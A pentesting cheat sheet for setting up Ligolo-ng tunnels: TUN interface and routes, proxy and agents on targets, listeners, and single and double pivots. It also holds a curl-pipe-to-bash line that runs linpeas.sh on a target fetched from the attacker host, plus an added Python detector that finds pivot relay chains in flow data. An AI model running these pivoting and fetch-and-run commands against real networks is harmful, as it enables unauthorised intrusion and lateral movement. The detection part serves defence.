Quick setup Ligolo
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (with no need for SOCKS).
Download the binaries from https://github.com/nicocha30/ligolo-ng/releases/tag/v0.4.4 or any later version.
1. Setup host
# Setup TUN interface and route traffic through target subnet
sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up && sudo ip route add 172.20.200.0/24 dev ligolo
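# Add another subnet in case of double pivot (use the second network's CIDR; re-adding a route that already exists fails with "RTNETLINK answers: File exists")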
sudo ip route add 172.20.200.0/24 dev ligolo
2. Start Ligolo proxy
# Start proxy on host
./proxy -selfcert
3. Run Ligolo agent on target
# Start agent on Linux
./agent -connect 172.10.10.10:11601 -ignore-cert
# Start agent on Windows
agent.exe -connect 172.10.10.10:11601 -ignore-cert
Listeners
For reverse connections you can add listeners. If, for example, you want to run an HTTP server on port 8888, add a listener for that port.
# Add listener
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:8888 --tcp
# Run http server
python -m http.server 8888
# You can then curl
curl http://172.10.10.10:8888/linpeas.sh | bash
Pivoting with Ligolo
A. You: 172.10.10.10 -- B. MS01: 10.10.14.14 -- C. BC01: 10.10.200.5
# Copy agent to MS01 and run it
./agent -connect 172.10.10.10:11601 -ignore-cert
Double Pivot with Ligolo
# Add new listener
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
# Copy agent to 2nd pivot (BC01) and connect to first pivot on port 11601
./agent -connect 10.10.14.14:11601 -ignore-cert
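Detecting the double pivot from the network side: the added example below is not part of the original page or of Ligolo-ng. It walks flow records and reports chains of hosts linked by connections to port 11601, where a host that both accepts and makes such a connection is acting as a relay. The flow records are constructed from the addresses used above, and matching on port 11601 is an assumption, since the port is configurable.

```python
from collections import defaultdict

AGENT_PORT = 11601  # port used in the commands above; configurable, so treat as a heuristic

# Constructed flow records (src_ip, dst_ip, dst_port), as might be exported from NetFlow or Zeek.
SAMPLE_FLOWS = [
    ("10.10.14.14", "172.10.10.10", 11601),  # first pivot -> proxy
    ("10.10.200.5", "10.10.14.14", 11601),   # second pivot -> listener on first pivot
    ("10.10.14.20", "10.10.14.14", 445),     # unrelated traffic
    ("10.10.14.30", "172.10.10.10", 443),    # unrelated traffic
]


def find_relay_chains(flows, port=AGENT_PORT):
    """Return host chains [innermost, ..., final destination] linked by flows to `port`."""
    upstream = defaultdict(set)  # src -> destinations it reaches on the port
    for src, dst, dport in flows:
        if dport == port and src != dst:
            upstream[src].add(dst)
    targets = set().union(*upstream.values())
    chains = []

    def walk(path):
        # Skip hosts already on the path so a loop in the data cannot recurse forever.
        nxt = [d for d in sorted(upstream.get(path[-1], ())) if d not in path]
        if not nxt:
            chains.append(path)
        for d in nxt:
            walk(path + [d])

    # Start from hosts that connect out on the port but receive no such connection.
    for leaf in sorted(set(upstream) - targets):
        walk([leaf])
    return chains


def relay_hosts(chains):
    """Hosts inside a chain: they accept on the port and also connect onward on it."""
    return sorted({h for chain in chains for h in chain[1:-1]})


if __name__ == "__main__":
    for chain in find_relay_chains(SAMPLE_FLOWS):
        print(" -> ".join(chain))
    print("relays:", relay_hosts(find_relay_chains(SAMPLE_FLOWS)))
```

A chain of length two is a single tunnel; any host reported by relay_hosts is worth checking for an unexpected listener on that port.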